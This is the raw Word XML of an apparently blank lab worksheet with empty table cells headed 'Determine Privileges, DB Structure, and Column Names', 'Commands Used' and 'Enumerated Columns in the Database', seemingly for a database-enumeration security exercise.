          <w:p w14:paraId="22F07382" w14:textId="77777777" w:rsidR="00D85036" w:rsidRDefault="00D85036" w:rsidP="00B65E6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DD9667F" w14:textId="77777777" w:rsidR="00B65E64" w:rsidRDefault="00B65E64" w:rsidP="00B65E6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FE9E702" w14:textId="6A635870" w:rsidR="00B65E64" w:rsidRDefault="00B65E64" w:rsidP="00B65E6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867F5DD" w14:textId="77777777" w:rsidR="00B65E64" w:rsidRDefault="00B65E64" w:rsidP="00B65E6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F8B6F87" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRDefault="00E857CC" w:rsidP="00B65E6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D188034" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRDefault="00E857CC" w:rsidP="00B65E6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EEDE33F" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRPr="00D85036" w:rsidRDefault="00E857CC" w:rsidP="00B65E6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85036" w:rsidRPr="00D85036" w14:paraId="7484F876" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A8FD7B2" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00E857C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85036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132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B528F5F" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="123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95302D4" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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0A07E9F" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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8265A0E" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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25978B8" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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D78F613" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00D8503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462DCA16" w14:textId="77777777" w:rsidR="00A34CD5" w:rsidRPr="005D2C80" w:rsidRDefault="00A34CD5" w:rsidP="00A34CD5">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b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4CD5" w:rsidRPr="005D2C80" w14:paraId="6743908C" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65AE91DF" w14:textId="77777777" w:rsidR="00A34CD5" w:rsidRPr="005D2C80" w:rsidRDefault="00A34CD5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="751EF6B8" w14:textId="77777777" w:rsidR="00A34CD5" w:rsidRPr="005D2C80" w:rsidRDefault="00A34CD5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FEBE176" w14:textId="77777777" w:rsidR="00A34CD5" w:rsidRPr="005D2C80" w:rsidRDefault="00A34CD5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57354601" w14:textId="77777777" w:rsidR="00A34CD5" w:rsidRPr="005D2C80" w:rsidRDefault="00A34CD5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="715F4B66" w14:textId="77777777" w:rsidR="00A34CD5" w:rsidRDefault="00A34CD5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76D206D9" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRDefault="00E857CC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BD31E40" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRDefault="00E857CC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48A1E731" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRDefault="00E857CC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="580315E8" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRDefault="00E857CC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17E9A382" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRDefault="00E857CC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31CB81E9" w14:textId="77777777" w:rsidR="00E857CC" w:rsidRPr="005D2C80" w:rsidRDefault="00E857CC" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E57F1B4" w14:textId="3B229C75" w:rsidR="00E07D7D" w:rsidRDefault="00E07D7D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF31D1" w:rsidRPr="00A51A96" w14:paraId="3710D3B3" w14:textId="77777777" w:rsidTr="006E027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5006FC7B" w14:textId="719E8D86" w:rsidR="00DF31D1" w:rsidRPr="003C713F" w:rsidRDefault="00DF31D1" w:rsidP="00725128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7.7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4965B2" w:rsidRPr="004965B2">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Determine Privileges, DB Structure, and Column Names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52D54A79" w14:textId="77777777" w:rsidR="004965B2" w:rsidRPr="006E027E" w:rsidRDefault="004965B2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55"/>
        <w:gridCol w:w="2093"/>
        <w:gridCol w:w="2430"/>
        <w:gridCol w:w="2182"/>
      </w:tblGrid>
      <w:tr w:rsidR="00894388" w:rsidRPr="00894388" w14:paraId="5C5FCAB3" w14:textId="77777777" w:rsidTr="006E027E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02AF1D70" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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9438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705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1309070A" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="5A2B70A5" w14:textId="77777777" w:rsidTr="006E027E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61F00B1E" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388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705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E772C9" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="286FAF35" w14:textId="77777777" w:rsidTr="006E027E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4F8D4BCC" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388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705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA1B37D" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="5D988C26" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:trHeight w:val="2042"/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FA15433" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B282176" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="1E6F3193" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:trHeight w:val="1250"/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4045774E" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388"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 User Level Privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43FEBB96" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="485CB434" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:trHeight w:val="1439"/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2ACDA434" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388"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 Admin Level Privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E212387" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="186016CC" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="277A17A4" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Database Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2093" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11E9C5DF" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00894388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Table Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5058C6F0" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00894388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Column Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2182" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78D4D79A" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00894388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Column Name Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00894388" w:rsidRPr="00894388" w14:paraId="664A4154" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="395760A8" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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2093" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6823F0FC" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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45E0D939" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2182" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DFA4C34" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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</w:tr>
      <w:tr w:rsidR="00894388" w:rsidRPr="00894388" w14:paraId="54EF4D60" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49B91692" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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2093" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CA3BDD2" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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10B618E1" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2182" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34E51F52" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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</w:tr>
      <w:tr w:rsidR="00894388" w:rsidRPr="00894388" w14:paraId="222C2096" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B784BBD" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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2093" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50FE9921" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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52457069" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2182" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CF65BCA" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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</w:tr>
      <w:tr w:rsidR="00894388" w:rsidRPr="00894388" w14:paraId="5D44CA9E" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11EAE9EB" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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2093" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C1CA486" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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71E0A5CF" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2182" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5245DD3A" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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</w:tr>
      <w:tr w:rsidR="00894388" w:rsidRPr="00894388" w14:paraId="0A7FBD2B" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="331DF35B" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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6705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F0DA960" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="00894388">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00894388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Others:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A278E01" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00894388" w:rsidRPr="00894388" w14:paraId="2FCAE200" w14:textId="77777777" w:rsidTr="006E027E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6188D750" w14:textId="4FECB404" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388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Enumerated </w:t>
            </w:r>
            <w:r w:rsidR="0087602B" w:rsidRPr="00894388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>User-Defined</w:t>
            </w:r>
            <w:r w:rsidRPr="00894388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Tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59B8F6D8" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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7E2B40E" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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F225307" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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2D81A7F" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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77D43A4" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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B98CBAF" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="3B2BBBBD" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:trHeight w:val="1700"/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154CE35C" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388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SQL Queries/Commands Used to Enumerate Columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="173AEB66" w14:textId="77777777" w:rsidR="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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15AB534" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="0089438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332FB9E" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="0089438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D792252" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="0089438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90B5C16" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="0089438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02131F4" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRDefault="00BE183E" w:rsidP="0089438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1BAED3B" w14:textId="77777777" w:rsidR="00BE183E" w:rsidRPr="00894388" w:rsidRDefault="00BE183E" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="70A25DF7" w14:textId="77777777" w:rsidTr="006E027E">
        <w:trPr>
          <w:trHeight w:val="1700"/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17CE0A32" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E0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94388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Enumerated Columns in the Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5669CD0C" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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3EC17A2" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="126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3536644" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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186EBF6" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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0170B1F" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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F126B12" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="0089438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94388" w:rsidRPr="00894388" w14:paraId="54A616A4" w14:textId="77777777" w:rsidTr="006E027E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1FFBB110" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="006E027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94388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705" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C46EAF" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="127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BD6E812" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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E91D2BA" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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B4E21C1" w14:textId="77777777" w:rsidR="00894388" w:rsidRPr="00894388" w:rsidRDefault="00894388" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
